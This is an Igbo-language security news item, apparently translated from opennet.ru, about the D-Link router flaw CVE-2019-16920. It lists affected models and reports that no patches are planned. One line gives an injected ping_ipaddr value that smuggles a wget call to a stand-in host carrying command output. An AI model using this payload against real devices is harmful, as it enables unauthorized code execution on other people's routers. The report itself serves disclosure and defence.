Adịghị ike na-erigbu tere aka na ndị na-anya ụgbọ elu D-Link

Na ndị na-anya ikuku D-Link mara adịghị ike dị ize ndụ (CVE-2019-16920), nke na-enye gị ohere ịme koodu n'akụkụ ngwaọrụ site na izipu arịrịọ pụrụ iche na onye na-ahụ maka "ping_test", ịnweta na-enweghị nkwenye.

N'ụzọ na-akpali mmasị, dị ka ndị mmepe firmware si kwuo, a ga-egbu oku "ping_test" naanị mgbe nyochachara ya, mana n'eziokwu, a na-akpọ ya n'ọnọdụ ọ bụla, n'agbanyeghị abanye na interface weebụ. Karịsịa, mgbe ị na-abanye na apply_sec.cgi script wee na-agafe paramita "action=ping_test", edemede ahụ na-atụgharị gaa na ibe nyocha, mana n'otu oge ahụ na-arụ ọrụ metụtara ping_test. Iji mezuo koodu ahụ, a na-eji adịghị ike ọzọ na ping_test n'onwe ya, nke na-akpọ ping utility na-enyochaghị nke ọma nke adreesị IP ezigara maka ule. Dịka ọmụmaatụ, iji kpọọ utility wget wee bufee nsonaazụ nke "echo 1234" iwu na onye ọbịa na-apụ apụ, kọwaa oke "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$(echo 1234)".

Adịghị ike na-erigbu tere aka na ndị na-anya ụgbọ elu D-Link

A kwadoro ọnụnọ nke adịghị ike ahụ na ụdị ndị a:

  • DIR-655 nwere firmware 3.02b05 ma ọ bụ karịa;
  • DIR-866L nwere firmware 1.03b04 ma ọ bụ karịa;
  • DIR-1565 nwere firmware 1.01 ma ọ bụ karịa;
  • DIR-652 (enweghị ozi gbasara ụdị firmware nwere nsogbu enyeghị)

Oge nkwado maka ụdị ndị a agwụlarị, yabụ D-Link kwuru, nke na-agaghị ahapụ ha mmelite iji kpochapụ adịghị ike, adịghị akwado iji ha ma na-adụ ọdụ iji dochie ha na ngwaọrụ ọhụrụ. Dị ka ihe nchekwa nchekwa, ị nwere ike igbochi ohere ịnweta interface weebụ naanị naanị adreesị IP ntụkwasị obi.

E mechara chọpụta na adịghị ike ahụ dịkwa na-emetụta ụdị DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 na DIR-825, atụmatụ maka mwepụta mmelite nke na-amabeghị.

isi: opennet.ru

Tinye a comment